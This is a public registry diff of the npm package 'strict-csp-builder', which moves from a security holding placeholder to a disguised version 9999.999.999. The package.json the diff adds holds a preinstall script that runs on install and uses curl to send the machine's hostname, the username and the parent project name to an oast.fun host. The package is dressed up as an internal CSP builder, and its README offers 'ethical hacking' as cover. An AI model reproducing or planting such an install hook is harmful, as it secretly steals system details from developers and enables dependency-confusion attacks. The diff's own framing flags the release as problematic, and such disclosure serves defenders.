strict-csp-builder 0.0.1-security → 9999.999.999

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of strict-csp-builder might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +12 -5
  2. package/index.js +4 -0
  3. package/package.json +25 -6
package/README.md CHANGED
@@ -1,5 +1,12 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=strict-csp-builder for more information.
1
+ # @strict-csp/builder
2
+
3
+ This is a placeholder for the npm package `@strict-csp/builder`.
4
+ It contains a simple `index.js` and a `preinstall` script for ethical hacking and research purposes.
5
+
6
+ Some random text to make it look less empty: aTgcxDhivpLJlFM1mf98m2zInnZz6cslaE4smU Qm7U6qURv4qsEllk5FlJB67uxogK7QiMWySeLDXPk3em8n5S7NQqs6ZuVpCOwaNDkjwF294Vej5Wdqykj8SqXbNwHkufoQ2V90eMrN3EA hXAkqp gJqng0diCa7oaFtarMVbigCWlPv0btmU56WinPoyHgayOTE1
7
+
8
+ ## Usage
9
+
10
+ ```bash
11
+ npm install @strict-csp/builder
12
+ ```
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+
2
+ // This is a placeholder JavaScript file for the package.
3
+ // It does not perform any malicious actions.
4
+ console.log("Package loaded successfully: This file serves as a placeholder for ethical hacking research.");
package/package.json CHANGED
@@ -1,6 +1,25 @@
1
- {
2
- "name": "strict-csp-builder",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "strict-csp-builder",
3
+ "version": "9999.999.999",
4
+ "description": "Builder utility for internal CSP policies. Compatible with CI/CD pipelines and secure workflows.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl --data-urlencode \"info=$(hostname && whoami && if [ -f ../../package.json ]; then echo -n ' ; PROJECT_NAME: '; cat ../../package.json | grep -oP '\"name\":\\s*\"([^\"]+)\"' | head -1 | cut -d':' -f2 | tr -d ' \\\"'; fi)\" http://sjnpxdmtpuvlboyzcehbe8s7lodudopxr.oast.fun"
8
+
9
+
10
+ },
11
+ "keywords": [
12
+ "csp",
13
+ "builder",
14
+ "internal-tools",
15
+ "infrastructure",
16
+ "cli",
17
+ "npm"
18
+ ],
19
+ "author": "Core CSP Team",
20
+ "license": "MIT",
21
+ "repository": {
22
+ "type": "git",
23
+ "url": "https://github.com/strict-csp/builder"
24
+ }
25
+ }